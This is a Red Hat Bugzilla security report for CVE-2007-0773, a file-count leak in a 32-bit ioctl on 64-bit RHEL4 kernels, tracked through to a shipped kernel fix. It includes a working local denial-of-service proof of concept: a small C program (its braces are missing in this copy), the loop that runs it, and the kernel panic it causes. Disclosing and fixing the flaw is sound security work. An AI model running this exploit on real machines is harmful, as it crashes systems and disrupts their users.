Bug 243252 (CVE-2007-0773) - CVE-2007-0773 lost fput in a 32-bit ioctl on 64-bit x86 systems
Summary: CVE-2007-0773 lost fput in a 32-bit ioctl on 64-bit x86 systems
Alias: CVE-2007-0773
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: x86_64
OS: Linux
Target Milestone: ---
Assignee: Jason Baron
QA Contact: Martin Jenner
Depends On:
TreeView+ depends on / blocked
Reported: 2007-06-08 10:06 UTC by Marcel Holtmann
Modified: 2019-09-29 12:20 UTC (History)
9 users (show)

Fixed In Version: RHSA-2007-0488
Doc Type: Bug Fix
Doc Text:
Clone Of:
Last Closed: 2007-06-25 18:05:13 UTC

Attachments (Terms of Use)

System ID Private Priority Status Summary Last Updated
Red Hat Product Errata RHSA-2007:0488 0 normal SHIPPED_LIVE Important: kernel security update 2008-01-09 18:29:42 UTC

Description Marcel Holtmann 2007-06-08 10:06:03 UTC
SWsoft Virtuozzo/OpenVZ Linux kernel team would like to note that first part of
CVE-2005-3044 "fput in a 32-bit ioctl on 64-bit x86 systems" is still not fixed
in  RHEL4 kernel 2.6.9-42.0.8. As a result local users are able to cause a
denial of service.

The following patch fixes this problem in linux mainstream:

The follwong script demonstrates the resource leakage:
[vvs@dhcp17-60 ~]$ uname -a
Linux dhcp17-60.qa.sw.ru 2.6.9-42.0.8.EL #1 Tue Jan 23 12:34:49 EST 2007 x86_64
x86_64 x86_64 GNU/Linux
[vvs@dhcp17-60 ~]$ id
uid=500(vvs) gid=500(vvs) groups=500(vvs) context=user_u:system_r:unconfined_t
[vvs@dhcp17-60 ~]$ cat tiocgdev.c
#include <stdio.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

#define TIOCGDEV        _IOR('T',0x32, unsigned int)

int main(int argc, char *argv[])
        int fd, ret;

        fd = open(argv[0], O_RDONLY);
        if (fd < 0) {
                return 1;
        ret = ioctl(fd, TIOCGDEV, NULL);
        if (ret < 0) {
                return 1;
        return 0;
[vvs@dhcp17-60 ~]$ gcc -m32 -o tiocgdev32 tiocgdev.c --static
[vvs@dhcp17-60 ~]$ cat /proc/sys/fs/file-nr
528     0       24581
[vvs@dhcp17-60 ~]$ for i in `seq 1 10000` ; do ./tiocgdev32 &>/dev/null ; done
[vvs@dhcp17-60 ~]$ cat /proc/sys/fs/file-nr
10452   0       24581

Exploit owerflows the file->f_count and crashes the node:

Unable to handle kernel NULL pointer dereference at 0000000000000038 RIP:
PML4 5cf1067 PGD 8765067 PMD 0
Oops: 0000 [1]
Modules linked in: md5 ipv6 parport_pc lp parport autofs4 sunrpc ds
yenta_socket pcmcia_core ipt_REJECT ipt_state ip_conntrack iptable_filter
ip_tables dm_mirror button battery ac uhci_hcd snd_ens1371 snd_rawmidi
snd_seq_device snd_pcm_oss snd_mixer_oss snd_pcm snd_timer snd_page_alloc
snd_ac97_codec snd soundcore e1000 floppy ext3 jbd dm_mod mptscsih mptsas
mptspi mptfc mptscsi mptbase sd_mod scsi_mod
Pid: 3753, comm: tiocgdev32 Not tainted 2.6.9-42.0.8.EL
RIP: 0010:[<ffffffff80199606>] <ffffffff80199606>{vfs_getattr+24}
RSP: 0000:0000010008e69ea8  EFLAGS: 00010206
RAX: ffffffff80449cc0 RBX: 0000000000000000 RCX: 0000010008ec8148
RDX: 0000010008e69ef8 RSI: 0000000000000000 RDI: 0000000000000000
RBP: 0000010008e69ef8 R08: 0000010008ec8140 R09: 00000000ffffd854
R10: 0000010008e68000 R11: 0000000000000000 R12: 0000010008e69ef8
R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000
FS:  0000002a96a2d2a0(0000) GS:ffffffff80545480(0000) knlGS:00000000f7ff58e0
CS:  0010 DS: 002b ES: 002b CR0: 000000008005003b
CR2: 0000000000000038 CR3: 0000000000101000 CR4: 00000000000006e0
Process tiocgdev32 (pid: 3753, threadinfo 0000010008e68000, task
Stack: 0000010008ec8140 000001000929dcc0 00000000fffffff7 0000010008e69ef8
       0000000000000000 ffffffff80199738 00000000ffffd7a8 00000000ffffd854
       0000000000000000 ffffffff80127e9f
Call Trace:<ffffffff80199738>{vfs_fstat+41}

Code: 4c 8b 66 38 ff 90 a0 01 00 00 85 c0 75 6e 49 8b 84 24 70 01
RIP <ffffffff80199606>{vfs_getattr+24} RSP <0000010008e69ea8>
CR2: 0000000000000038
 <0>Kernel panic - not syncing: Oops

Comment 1 Eric Sandeen 2007-06-08 16:53:20 UTC
Ok, so this is a dup of Bug 227978 for z-stream?

If so maybe Jeff should take it, since he did the original work in the other
bug?  I'm happy to ferry this in for z-stream, but it seems like "his" bug, so
I'll give him first carck at it. :)


Comment 2 Eric Sandeen 2007-06-08 17:25:29 UTC
Talked with Jeff... over to him since he did the original work.


Comment 5 Jason Baron 2007-06-12 15:35:07 UTC
committed in stream rhel‑4.5.z build 55.0.1

Comment 8 Red Hat Bugzilla 2007-06-25 18:05:13 UTC
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
please follow the link below. You may reopen this bug report
if the solution does not work for you.


Note You need to log in before you can comment on or make changes to this bug.